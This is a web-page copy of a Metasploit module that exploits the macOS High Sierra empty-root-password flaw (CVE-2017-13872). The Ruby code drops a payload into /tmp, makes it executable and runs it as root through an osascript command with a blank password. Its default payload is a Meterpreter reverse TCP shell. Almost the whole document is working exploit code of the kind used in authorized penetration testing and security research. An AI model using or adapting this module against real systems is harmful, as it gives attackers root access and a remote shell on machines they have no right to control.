CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/osx/local/root_no_password.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Local

7
  Rank = ExcellentRanking

8


9
  include Msf::Post::File

10
  include Msf::Post::OSX::Priv

11
  include Msf::Exploit::EXE

12
  include Msf::Exploit::FileDropper

13


14
  def initialize(info = {})

15
    super(update_info(info,

16
      'Name'          => 'Mac OS X Root Privilege Escalation',

17
      'Description'   => %q{

18
        This module exploits a serious flaw in MacOSX High Sierra.

19
        Any user can login with user "root", leaving an empty password.

20
      },

21
      'License'       => MSF_LICENSE,

22
      'References'    =>

23
        [

24
          [ 'CVE', '2017-13872' ],

25
          [ 'URL', 'https://twitter.com/lemiorhan/status/935578694541770752' ],

26
          [ 'URL', 'https://news.ycombinator.com/item?id=15800676' ],

27
          [ 'URL', 'https://forums.developer.apple.com/thread/79235' ],

28
        ],

29
      'Platform'      => 'osx',

30
      'Arch'          => ARCH_X64,

31
      'Author'         => [

32
        'chethan177',  # earliest public discovery

33
        'lemiorhan',   # making this well-known via Twitter

34
        'timwr',       # Metasploit module

35
      ],

36
      'DefaultOptions' =>

37
      {

38
        'PAYLOAD'      => 'osx/x64/meterpreter_reverse_tcp',

39
      },

40
      'SessionTypes'  => [ 'shell', 'meterpreter' ],

41
      'Targets'       => [

42
        [ 'Mac OS X 10.13.1 High Sierra x64 (Native Payload)', { } ]

43
      ],

44
      'DefaultTarget' => 0,

45
      'DisclosureDate' => '2017-11-29'

46
    ))

47
  end

48


49
  def exploit_cmd(root_payload)

50
    "osascript -e 'do shell script \"#{root_payload}\" user name \"root\" password \"\" with administrator privileges'"

51
  end

52


53
  def exploit

54
    if is_root?

55
      fail_with Failure::BadConfig, 'Session already has root privileges'

56
    end

57


58
    payload_file = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"

59
    print_status("Writing payload file as '#{payload_file}'")

60
    write_file(payload_file, payload.raw)

61
    register_file_for_cleanup(payload_file)

62
    output = cmd_exec("chmod +x #{payload_file}")

63
    print_status("Executing payload file as '#{payload_file}'")

64
    cmd_exec(exploit_cmd(payload_file))

65
  end

66
end

67


68